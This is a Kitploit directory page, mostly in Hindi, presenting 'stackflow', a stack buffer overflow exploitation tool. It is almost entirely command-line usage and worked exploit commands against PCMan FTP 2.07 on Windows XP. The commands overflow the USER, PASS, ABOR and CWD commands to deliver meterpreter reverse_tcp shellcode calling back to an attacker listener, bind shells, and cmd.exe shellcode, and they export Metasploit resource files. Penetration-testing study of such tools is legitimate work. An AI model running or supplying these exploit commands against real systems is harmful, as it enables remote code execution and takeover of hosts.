Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
stackflow — यूनिवर्सल स्टैक-आधारित बफ़र ओवरफ़्लो शोषण उपकरण | Kitploit
उपकरण/GitHubGitHub/d4rkcat/stackflow
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडडीबगर्सफज़िंगपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubd4rkcat/stackflow

stackflow

यूनिवर्सल स्टैक-आधारित बफ़र ओवरफ़्लो शोषण उपकरण

रिपॉजिटरी देखें
23812 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

stackflow

सार्वभौमिक स्टैक-आधारित बफर ओवरफ्लो शोषण उपकरण

Usage

root@kitploit:~
usage: ./stackflow.py OPTIONS

optional arguments:
  -h, --help            show this help message and exit
  -r RHOST, --rhost RHOST
                        rhost
  -p RPORT, --rport RPORT
                        rport
  -c CMDS, --cmds CMDS  commands to send to server before overflow
  -v VULNCMD, --vulncmd VULNCMD
                        vulnerable command
  -o OFFSET, --offset OFFSET
                        offset to EIP
  -ao AUTOOFFSET, --autooffset AUTOOFFSET
                        calculate offset from cyclic pattern EIP string
  -a RETURNADD, --returnadd RETURNADD
                        return address
  -n NOPS, --nops NOPS  number of NOPS \x90 x 4 to prepend
  -m PAYLOAD, --payload PAYLOAD
                        MSF payload
  -i LHOST, --lhost LHOST
                        lhost
  -l LPORT, --lport LPORT
                        lport
  -f FUZZ, --fuzz FUZZ  Fuzz with cyclic pattern of size
  -t, --calc            Send calc.exe shellcode
  -t1, --cmdprompt      Send cmd.exe shellcode
  -d, --display         Display the exploit buffer
  -q, --quiet           Display less cruft
  -w TIMEOUT, --timeout TIMEOUT
                        Timeout for socket (Default: 5)
  -e CFEXPORT, --cfexport CFEXPORT
                        Export exploit config and metasploit rc file
  -g CFIMPORT, --cfimport CFIMPORT
                        Import and run exploit from config file
  -s STANDALONE, --standalone STANDALONE
                        Export exploit to a standalone python script

सभी विकल्पों को कमांड लाइन के माध्यम से इनपुट किया जा सकता है या कॉन्फ़िग फ़ाइल से पढ़ा जा सकता है।

PCMan FTP 2.07 के कुछ उदाहरण WindowsXP SP3(ENG) पर चल रहे हैं:

असुरक्षित ऐप: http://www.exploit-db.com/wp-content/themes/exploit/applications/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z

Exploit without any commands and send meterpreter/reverse_tcp shellcode dialing back to 192.168.0.2 on port 4444:

root@kitploit:~
./stackflow.py -i 192.168.0.2 -l 4444 -r 192.168.0.9 -p 21 -o 2012 -m windows/meterpreter/reverse_tcp -a 7E429353

Exploit the USER command and send meterpreter/reverse_tcp shellcode dialing back to 192.168.0.2 on port 4444:

root@kitploit:~
./stackflow.py -i 192.168.0.2 -l 4444 -r 192.168.0.9 -p 21 -o 2007 -m windows/meterpreter/reverse_tcp -v 'USER' -a 7E429353

Exploit the PASS command and send calc.exe shellcode:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 6103 -v 'PASS' -c 'USER anonymous' -a 7E429353 -t

Exploit the ABOR command and send meterpreter/bind_tcp shellcode listening on 4444:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 2007 -v 'ABOR' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -l 4444 -m windows/meterpreter/bind_tcp

Exploit the CWD command and send cmd.exe shellcode and display the exploit buffer:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 2008 -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -t1 -d

Fuzz the STOR command with a cyclic buffer of size 3000:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -v 'STOR' -c 'USER anonymous&PASS [email protected]' -f 3000

Exploit the CWD command with auto-offset string from EIP after fuzzing crash and send cmd.exe shellcode:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -ao o9Cp -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -t1

Export the exploit py and metasploit rc file:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 2008 -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -e revCWD -l 4444 -m windows/meterpreter/reverse_tcp -i 192.168.0.2

msfconsole शुरू करें और शोषण और हैंडलर चलाएँ:

root@kitploit:~
msfconsole -r revCWD.rc

msfconsole से शोषण और हैंडलर चलाएँ:

root@kitploit:~
resource /path/to/revCWD.rc

कॉन्फ़िग फ़ाइल से शोषण चलाएँ (कोई हैंडलर नहीं!):

root@kitploit:~
./stackflow.py -g revCWD(.py)
टूल डाउनलोड करें